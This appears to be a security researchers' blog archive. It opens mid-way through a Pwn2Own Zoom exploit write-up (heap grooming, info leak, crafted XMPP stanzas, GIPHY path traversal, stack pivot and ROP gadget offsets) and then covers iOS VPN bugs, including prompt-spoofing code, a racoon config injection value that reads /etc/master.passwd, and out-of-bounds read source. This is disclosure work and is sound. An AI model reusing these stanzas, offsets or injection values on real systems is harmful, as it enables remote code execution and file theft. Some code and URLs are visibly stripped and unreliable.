We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url=" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "" prepended to it. This means a request is performed to:

"" + image
"" + " vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
" vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url=" 1aWl62KifvJ_LDECBM1" size="4322534"/>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs:</body>
  <active xmlns=""/>
    <format>%1$@ sent you an image</format>
      <arg>John Doe</arg>
    <from n="John Doe" res="ZoomChat_pc"/>
  <giphyv2 id="YQitE4YNQNahy" url="" tags="hacker">
    <pcInfo url="" size="1456787"/>
    <mobileInfo url="" size="549356"/>
    <bigPicInfo url="[file_id]" size="4322534"/>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp

POP_RET, # Not used, padding for other objects
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
SHELLCODE & 0xfffff000,

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.


After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as “Packet Tunnel Provider” or “App Proxy Provider”. we did not spend any time on the latter two, but only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;

It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking. For example, making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any files larger than 65,535 bytes, subtracting the overhead for the rest of the packet, IP and UDP header, can not be read.

For example, following files were found to often be below the limit and may sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files on those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

 * get ISAKMP data attributes
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
						 "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						 len, tlen);
					return -1;
				p = (u_char *)(d + 1);
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);


		switch (type) {
			sa->enctype = (u_int16_t)ntohs(d->lorv);

			sa->hashtype = (u_int16_t)ntohs(d->lorv);

			sa->authmethod = ntohs(d->lorv);

			sa->dh_group = (u_int16_t)ntohs(d->lorv);

			int type = (int)ntohs(d->lorv);
				sa->dhgrp->type = type;
				return -1;
			sa->dhgrp->prime = val;

			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);

			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);

			sa->dhgrp->curve_a = val;

			sa->dhgrp->curve_b = val;

			int type = (int)ntohs(d->lorv);
			switch (type) {
				life_t = type;
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
				    "life duration must follow ltype\n");

			switch (life_t) {
				sa->lifetime = ipsecdoi_set_ld(val);
				if (sa->lifetime == 0) {
						"invalid life duration.\n");
					goto err;
				sa->lifebyte = ipsecdoi_set_ld(val);
				if (sa->lifebyte == 0) {
						"invalid life duration.\n");
					goto err;
					"invalid life type: %d\n", life_t);
				goto err;

			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
					"keylen %d: not multiple of 8\n",
				goto err;
			sa->encklen = (u_int16_t)len;
			/* unsupported */

			sa->dhgrp->order = val;


		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
				"keylen must not be specified "
				"for encryption algorithm %d\n",
			return -1;

	return 0;
	return error;

In 9 places in the code this pattern was used without a check at the start of the loop body that the remainder of the list contained at least the number of bytes that the header is long, nor was there a check that after the parsing the number of remaining bytes was exactly 0. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.

